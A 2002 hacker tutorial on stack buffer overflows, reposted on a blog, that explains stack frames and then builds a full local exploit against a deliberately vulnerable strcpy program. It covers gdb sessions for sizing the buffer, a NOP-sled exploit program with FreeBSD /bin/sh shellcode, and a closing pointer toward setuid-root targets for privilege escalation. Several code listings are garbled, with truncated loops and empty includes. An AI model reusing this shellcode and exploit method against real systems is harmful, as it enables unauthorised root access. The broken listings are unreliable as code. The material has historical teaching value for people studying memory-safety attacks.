четвъртък, 28 февруари 2008 г.

--=Buffer Overflows by drunkk=--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0x1. INTRODUCTION

Site: http://www.sig-hup.net/
E-Mail: drunkk@sig-hup.net
IRC: Undernet -> #gcc
Date: January 10, 2002

This article explains buffer overflows. I didn't get into details only
in the most important parts. The code was tested on FreeBSD 4.3-REL and on
Linux RedHat 7.0, but it should work just fine on other systems too.
Notice that the shellcode is not the same in FreeBSD as it is in Linux.
Let's get started since i'm tired of stupid introductions.

Chapters:
- introduction
- understanding how the stack works
- short theory about buffer overflows
- executing arbitrary code and the shellcode
- finding the buffer size
- offsets
- generating the buffer
- the end

0x2. UNDERSTANDING HOW THE STACK WORKS

To understand what a buffer overflow is and how it works he must first
understand how the memory is organized for each function and process.
For each process we got a text, data and a stack segment or stack
frame. We are going to concentrate on the stack. Elements can be pushed
and poped off the stack this way: the last object pushed in, is the first
one that gets to be popped out, and it is called a LIFO stack (last
in/first out).
The stack is divided into segments, called frames. Each
function/process has it's own frame in which you can find local dynamic
variables, and data for recovering the previous frame pointer. This stuff
is very usefull to limit permissions on the stack and in memory.
The data for recovering the previous frame pointer are: the Instruction
Pointer (IP - represents the address of the instruction below the point
where the function was called, so that it knows where to return in the
calling function), the Frame Pointer or the Base Pointer (EBP, which
represents the address where the previous frame pointer begins). We also
have another register reffering to the stack, the Stack Pointer (SP) and
it contains the memory address of the last object pushed into the stack
(the top of the stack).

example.c:

void function(int a,b,c) {
char buffer1[5];
char buffer2[20]
}

main() {
function(1,2,3);
// The line below is pointed to by the Instruction Pointer
}

Parameters of the stack are pushed into the stack backwards, in this
example c, then b, then a. The stack would look like this:

[ buffer2 ][ buffer1 ][ BP ][ IP ][ a ][ b ][ c ]

BP - Base Pointer (Frame Pointer)
IP - Instruction Pointer (Return address)
buffer1, buffer2 - dynamic variables of function() are allocated on the
stack.

When function() finishes execution it pops out it's variables from the
stack (in this case buffer1 and buffer2). Remember, the actual base
pointer (frame pointer) is not the one on the stack. The base pointer on
the stack contains the content (heh) of the frame pointer for the previous
frame, so it is popped and now we are working with the previous frame of
the calling function/process. Then it pops the instruction pointer (IP)
and returns to the instruction at the address inside it (see the comment
in the code).
If you compile the code with gcc, using the -S switch (gcc -S -o
example.asm example.c), you will get the assembly code representation of
example.c. Notice the first two lines where the current stack pointer
becomes the frame pointer, though, the beginning of our new frame, after
the current EBP is pushed into the stack and saved.

push %ebp # saves the current base pointer

mov %esp, %ebp # the stack pointer becomes the
current base pointer

sub $0x20, %esp # the stack pointer is moved down
by 0x20 to allocate space for
buffer1 and buffer2...

...i'm sure you're wondering why it allocates 32 bytes (because 0x20 in
hex is 32 bytes) and buffer1 and buffer2 are made of only 15 bytes. Wrong!
Memory is organized in words (1 word = 4 bytes = 32 bits), so the 5 byte
buffer1 is actually 8 bytes in memory, and the 20 byte buffer, buffer2, is
actually 24 bytes in memory, by that the total of 32 bytes = 0x20 (in
hex).

0x3. SHORT THEORY ABOUT BUFFER OVERFLOWS

I'll explain this very shortly, i hope you'll understand.
Take a look at the graphical representation of the stack above. Notice
that buffer1 is 8 bytes and it is next to %ebp and %eip. Now let's suppose
we are using strcpy() to copy a string into buffer1. This must be smaller
then 8 bytes (of course, you as a regular coder know that it should be
smaller then 5 bytes, but until 8 bytes you do no harm). Now usualy
functions to boundary checking for this kinds of operations like buffer
moves, copies etc. But strcpy, strcat, fgets and other functions don't, so
if we'll write more then 8 bytes in buffer that'll be a buffer overflow
and we'll overwrite the base pointer and maybe the instruction pointer. A
buffer overflow is not necessarilly defined by overwriting %ebp and %eip.
But you'll see in the next section what insecure coding like that can
result into (benefiting the hacker, of course).

example2.c:

main() {
char buffer[12], big[16];
for(i=0;i<16;i++) { big[i]='A' }
strcpy(buffer, big);
}

You can notice above that big is 4 bytes bigger then buffer. We fill
big with A-s and then we copy it over(into) buffer. The initial stack
before anything happens looks like this (1 space = 1 byte).

[ big ][ buffer ][ BP ][ IP ]....

Now, big is filled with A-s and copied over buffer overwriting the base
pointer:

[AAAAAAAAAAAAAAA][AAAAAAAAAAAA][AAAA][ IP ]....

As you see, our for() cycle fills the "big" buffer with 'A'-s and then
copies it over buffer using strcpy() with no boundary checking, by that
overwriting EBP.

0x4. EXECUTING ARBITRARY CODE AND THE SHELLCODE

The Instruction Pointer points to an instruction in memory as we talked
about it in part 1. Now i hope you all know coding and i don't have to
give out coding lessons here. I will only mention that a pointer takes up
4 bytes in memory (because a memory address is 4 bytes long, ex.
0xbfbfcd0a). If we could somehow overwrite the Instrucion Pointer with
another memory address that points to an arbitrary code that we wish to
execute we could exploit the vulnerable program. So let's get started on
this.
Now a very short update on the shellcode in case you don't know what it
is. As an example let's say that we want to redirect the Instruction
Pointer to point to a code that will spawn us a shell. Now how do we
insert that code into the memory? Easy, by designing the shellcode for it.
I won't go into details on how do design it, you can get it anywhere, but
at least you should understand how it works and why it is used.
This is the code we wish to execute:

example3.c:

#include

main() {
char *execs[2];
execs[0] = "/bin/sh";
execs[1] = NULL;
execve(name[0], name, NULL);
}

Now this code will spawn us the shell. To get the shellcode and get it
into our program you'll first need to compile the program using -S and -
static (includes source code for functions, so it doesn't depend on any
specific libraries) to get the assembly representation of the source code.
I assume you have knowledge of ASM. Now try and make that code "general"
so that it won't contain anything else but memory distances, and no
specific addresses, so that it will work anywhere (this is the part i am
skipping).
After you make the final ASM code, rewrite it in C with a simple main()
function like this:

main() {
__asm__("
// Your asm code goes here
");
}

...then compile it and debug it again with gdb. Type "disassemle main"
to see the full asm code of your asm code :). We need this code to be
executed in memory so that the vulnerable program spawns us a shell. If
you designed the correct code you should notice that the code modifies
itself, so we can't put it into the text zone of the memory
(unmodifiable), we can only put it into the data zone which can be
modified while the program is running. So we need to represent our asm
code in hex. Notice that each instruction begins with a memory address
then , where x is the distance of bytes from the beginning of
main(). You can use the x/FMT ADDRESS command in gdb to represent/see a
line of code in a format that you want. Use the viewing of the code in hex
value per byte. To do this do x/bx main+x. Replace x with the first
instruction after the initialization of the function (without the push of
%ebp, and the mov for the new stack pointer). I guess it should be
if you don't have any NOP's before the code. Now you get the hex
representation of the first byte of the code we need, keep pressing
until you get to the last byte then write the shellcode into a char
shellcode[] and save the file so that you won't loose it.
Now we got the shellcode inside a local variable. The ideea of this
buffer overflow is to fill buffer1 (in the first example as an instance)
like this: [ shellcode &shellcode &shellcode .... ]. Are you getting the
ideea? The shellcode will be contained in the beginning of buffer2, so in
the next lines, and the overflow, we'll keep writing the memory address of
the beginning of buffer1 where our shellcode is located. When the function
finishes (wherever it is main(), or another function, process, it doesn't
matter), it will pop everything out that is not needed anymore, by this
popping the Instruction Pointer which represents the memory address of our
buffer1 and that code will be executed spawning a shell (because IP
contains the memory address &shellcode = &buffer1). Remember, the stack
can be read anywhere, anyhow on a frame, using refrences as a distance
from the base pointer, only elements may only be popped/pushed out/in LIFO
style. You will see a lot more examples in the next sections, so don't get
scared if you don't understand everything yet.

0x5. FINDING THE BUFFER SIZE

Now let's suppose the code below is the code we want to exploit:

vuln.c:

#include
#include

int main(int argc, char *argv[]) {
char st[512];
if (!(argc>1)) {printf("Not enough parameters.\n"); return(0);}
strcpy(st, argv[1]);
}

This code takes the first argument in the command line and copies it
into the st buffer which is 512 bytes. All we need to do is put our buffer
containing the shellcode inside st so that it overflows it and our code
(the shellcode) gets to be executed. How to do this is what i'll explain
in this section.
This is what the stack looks like for the compiled vuln.c:

# gcc -o vuln vuln.c
# ./vuln abcdefghik
# ./vuln `perl -e 'printf "A"x600'`
Segmentation fault (core dumped)
#

As you can see, the first time we insert "abcdefghijk" into argv[1], by
this into st[512], nothing happens. But the next time we insert 600 "A"-s
into st[512] through argv[1] we get a "Segmentation Fault", meaning that
we redirected the IP to somewhere where it isn't supposed to point; that
address being 0x41414141. 0x41 is the hex code for the ASCII code of 'A',
inserted into the four bytes of the IP address resulting into 0x41414141.
Now let's debug the program so that you can see for yourself:

# gdb vuln
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) run `perl -e 'printf "A"x600'`
Starting program: /sig-hup/code/b0f/vuln `perl -e 'printf "A"x600'`
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info registers
eax 0xbfbff79c -1077938276
ecx 0xbfbff9f4 -1077937676
edx 0xbfbffd37 -1077936841
ebx 0x2 2
esp 0xbfbff9a4 0xbfbff9a4
ebp 0x41414141 0x41414141
esi 0xbfbff9f0 -1077937680
edi 0xbfbff9fc -1077937668
eip 0x41414141 0x41414141
eflags 0x10282 66178
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb)

As you can see in the example above, we execute ./vuln again inside gdb
to see what went wrong, and by doing "info registers" or "i r", we see the
content of the registers when the segmentation fault happened. Notice that
first the base pointer (ebp) is overwritten with 0x41's, and then the
instrution pointer (eip) with the same data. Now we want to put exactly
four bytes into %eip, forming the address that will point back to the
beginning of our buffer where the code we wish to execute is located, but
to do this we must first find out how big our overflow buffer needs to be.
We will use the next code to try and find out:

getsize.c:

#include

#define DEFAULT_SIZE 100

main(int argc, char *argv[]){
int bsize,i;
char *buff;

bsize = DEFAULT_SIZE;

if (argc>1) bsize = atoi(argv[1]);
if (!(buff=malloc(bsize))) { printf("malloc() err.\n");return(1);}

for(i=0;i for(i=bsize-4;i<=bsize;i++) buff[i] = 0x68;

memcpy(buff, "EGG=", 4);
putenv(buff);

system("/bin/sh");
}

What we do above is giving ./getsize as an argument a buffer size for
testing, if no argument is given, it takes the default buffer size set:
DEFAULT_SIZE, which is 100 bytes. Then we fill the buffer with 0x69 (sex
number :)) which is 'i', and the last four bytes are filled with 0x68
which is 'h'. We wanna get a buffer size that will segfault our code and
get us everything with 0x69, including %ebp, and 0x68 into %eip only (the
whole four bytes). For easier work i used putenv() to export the testing
buffer into an environment called EGG, then it spawns a shell so we can
use the environment and not loose it. Now let's try and guess the correct
size:

# gcc -o getsize getsize.c
getsize.c: In function `main':
getsize.c:11: warning: assignment makes pointer from integer without a cast
# ./getsize 600
# ./vuln $EGG
Segmentation fault (core dumped)
# gdb vuln
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) run $EGG
Starting program: /sig-hup/code/b0f/vuln $EGG
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x69696969 in ?? ()
(gdb) i r
eax 0xbfbff540 -1077938880
ecx 0xbfbff790 -1077938288
edx 0xbfbffad7 -1077937449
ebx 0x2 2
esp 0xbfbff748 0xbfbff748
ebp 0x69696969 0x69696969
esi 0xbfbff794 -1077938284
edi 0xbfbff7a0 -1077938272
eip 0x69696969 0x69696969
eflags 0x10282 66178
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb) q
The program is running. Exit anyway? (y or n) y
# exit
#

The buffer size of 600 bytes that we used seems to be too big because
it overwrites %eip with 0x69, which is the 'i', and we need only 0x68
inside %eip, and 0x69 inside %ebp. So let's try a smaller size, like, uhm,
520?

# ./getsize 520
# ./vuln $EGG
Segmentation fault - core dumped
# gdb vuln
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) run $EGG
Starting program: /sig-hup/code/b0f/vuln $EGG
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x8040068 in ?? ()
(gdb) i r
eax 0xbfbff5e0 -1077938720
ecx 0xbfbff7e0 -1077938208
edx 0xbfbffb27 -1077937369
ebx 0x2 2
esp 0xbfbff7e8 0xbfbff7e8
ebp 0x68686868 0x68686868
esi 0xbfbff834 -1077938124
edi 0xbfbff840 -1077938112
eip 0x8040068 0x8040068
eflags 0x10286 66182
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb) q
The program is running. Exit anyway? (y or n) y
# exit
#

Woah! The end of the buffer, the 0x68686868 (4 'h'-s) are inside %ebp,
and %eip contains its original value. So what we oviously need to do is
push the buffer further with 4 bytes, so that we'll get all the 4 0x68's
inside %eip, the final buffer size being 524. Let's see if this works:

# ./getsize 524
# ./vuln $EGG
Segmentation fault - core dumped
# gdb vuln
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) run $EGG
Starting program: /sig-hup/code/b0f/vuln $EGG
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x68686868 in ?? ()
(gdb) i r
eax 0xbfbff5d8 -1077938728
ecx 0xbfbff7e0 -1077938208
edx 0xbfbffb27 -1077937369
ebx 0x2 2
esp 0xbfbff7e0 0xbfbff7e0
ebp 0x69696969 0x69696969
esi 0xbfbff82c -1077938132
edi 0xbfbff838 -1077938120
eip 0x68686868 0x68686868
eflags 0x10282 66178
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb) q
The program is running. Exit anyway? (y or n) y
# exit
#

Bingo! We got all the 0x69's until exactly where the IP is, so now we
know this is the size our overflow buffer needs. It might take you longer
on other vulnerable programs to find the correct size, but if you wouldn't
use this kinda methods like this code, trust me, it would be a lot more
"pain".

0x6. OFFSETS

So now we got the our next problem, and the last one (pheew), finding
the current offset. Now we know that the stack in memory starts at the
same address for every process (the stack, not the frame pointer, the
frame pointer is different for each process). The stack bottom memory
address is a high value like, let's say 0xFF, and the stack grows up, but
to lower memory addresses, for example our stack pointer is a smaller
value the 0xFF (if we are taking this memory address for the stack
bottom). Stick with this. We are going to do the same as in getsize.c for
the exploit program: generate the buffer, export it into an environment,
then execute a shell so we can use our environment on the vulnerable
program. Now, we start the exploit program, then inside the spawned shell
we start the vulnerable program, ./vuln is going to make another frame
pointer on top of our exploit program, and the shell. So what we need to
guess is the memory address where are buffer will be located inside
st[512] (remember?), and that will be the value that we will put inside
%eip. To make this easier we'll use this function that returns the current
stack pointer (the SP when we are inside the exploit program), and
decrease a value (called offset) from it, resulting into the aproximate
address of where st[512], and by this, our buffer, is located in memory.
This easy function code will give us out the stack pointer for Linux and
FreeBSD systems (other systems have different code).

unsigned long get_esp() {
__asm__("movl %esp, %eax");
}

What every function returns is put into the EAX register, so what we do
here is putting the stack pointer(ESP) inside EAX and the function returns
it to us. Easy until now, right?

0x7. GENERATING THE BUFFER

Now let's try and make the exploit. I'll try and explain this as
detailed as i can, but understanding won't be a problem if you got good
knowledge of pointers and they're usage. This is the exploit code, that
takes as a parameter the buffer size that we already know, and then an
offset that we need to guess (i used the FreeBSD shellcode and CShell
because i've tested tested this one under FreeBSD, but you can modify
that):

xpl.c:

#include
#include
#include

char freebsd[] =
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
"\x02\x02\x02/bin/sh.-c.sh";

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 524
#define NOP 0x90

unsigned long get_esp() {
__asm__("mov %esp,%eax");
}

main(int argc, char *argv[]) {
long *ret_addr, addr, offset;
char *nop_addr, *buff, *ptr;
unsigned int bsize, i;

bsize = DEFAULT_BUFFER_SIZE;
offset = DEFAULT_OFFSET;

if (argc>1) bsize = atoi(argv[1]);
if (argc>2) offset = atoi(argv[2]);

addr = get_esp() - offset;

if (!(buff=malloc(bsize))) {
printf("Not enough memory to allocate for buffer.\n");
}

ret_addr = (long *)buff;

for (i=0;i for (i=0;i
ptr = buff + ((bsize/2)-(strlen(freebsd)/2));
for (i=0;i
memcpy(buff, "BUF=", 4);
putenv(buff);

printf("Trying:\n\naddr: 0x%x\nbsize: %d bytes\n\n", addr, bsize);

system("/bin/csh");
}

Now, i am going to explain this step by step (almost), starting from
"addr = get_esp() - offset", that calculates a memory address with the
offset given from the current stack pointer, this being the address that
we will use to try to exploit the program and spawn our shell. Now the
buffer we used is char*, made of 1 byte/object, and we need to keep
writing on 4 bytes on the buffer because that's how long a memory address
is (remember the eip being 0x68686868?). So we'll use another pointer,
ret_addr, and we'll make it point to our char buffer (1 byte), by casting
it. Then inside the first for() we keep increasing ret_addr by one and
putting addr (the buffer address we are assuming to be correct) inside
buf. Notice that ret_addr is of type long, which is 4 bytes, and by
increasing it with 1, we don't increase it to point further with 1 byte,
we increase it to point further with one "unit", which is 4 bytes in this
case.
So we got our buffer filled with this address. Now we only have to
insert the shellcode and a thing to make this all easier to "guess".
We insert the NOP instruction (0x90) into half of the buffer.
The assembly NOP instruction means "Null OPeration", and it tells the
processor not to do anything. This instruction is usualy used for timing
purposes. We put it into the first half of our buffer because it could
take forever to guess the exact offset, and by that the exact memory
address of where it is located. By using this NOP's, we don't have to
guess the offset size exactly, it is enough for our exploit to point the
Instruction Pointer between does NOP's which will execute the Null
Operation 1 byte by one down towards our shellcode which is inserted later
in the code into our buffer in the middle of it (those NOP's don't take
long, you can hardly notice it), and when it get's to it, it executes the
shellcode and we got a spawned shell. Now let's test our code and see what
happens:

localhost# gcc -o xpl xpl.c
localhost# ./xpl
Trying:

addr: 0xbfbffbdc
bsize: 524 bytes

localhost# ./vuln $BUF
# exit
localhost# exit
exit
localhost#

Heheh, we didn't even need a different offset, and the exploit worked.
As you can see, it exports the BUF environment containing our generated
buffer, and we run ./vuln and give BUF as a parameter to it, spawning us
the shell.
I hope i didn't confuse you with all those exits :).

0x8. THE END

I was running these programs as root and i'm not sure that you got the
ideea. One thing i'm sure of is that you are used to getting root when an
exploit is used, well no! This one doesn't give you root. You must exploit
a function that runs as uid 0 (root - setuid(0)), and let's you run it as
a shell user, spawn you the shell, and that'll give root. Try finding this
kinds of programs inside the Operating System's sources, etc. Mail me for
questions or info at drunkk@sig-hup.net or ask me on IRC.

Thanks to the following people that made this happen:

bored - i wonder if i'll ever catch you being bored
trappie - you started this shit (you know what i mean)
RLoxley - you gave me the ideea for this article
maloman - can't wait to get together, smoke some bud
Bruno - read this again ;)
humstrux - man, do you need help finding your way, are you lost? :/
xum - ;)
c0balt - word up!
Pericool - keep up the php werk and the webdesign
#hackphreak - word up for everyone there
#gcc - a very Big thank you for all that support me there

This article can be found on these sites:

1) http://www.sig-hup.net/
2) http://www.hackphreak.org/
3) http://atronica.darktech.org/

Recommended for more documentation:

1) http://code.box.sk/
2) http://www.hackphreak.org/
3) http://www.hert.org/
4) http://www.phrack.org/

/* EOF */


Няма коментари: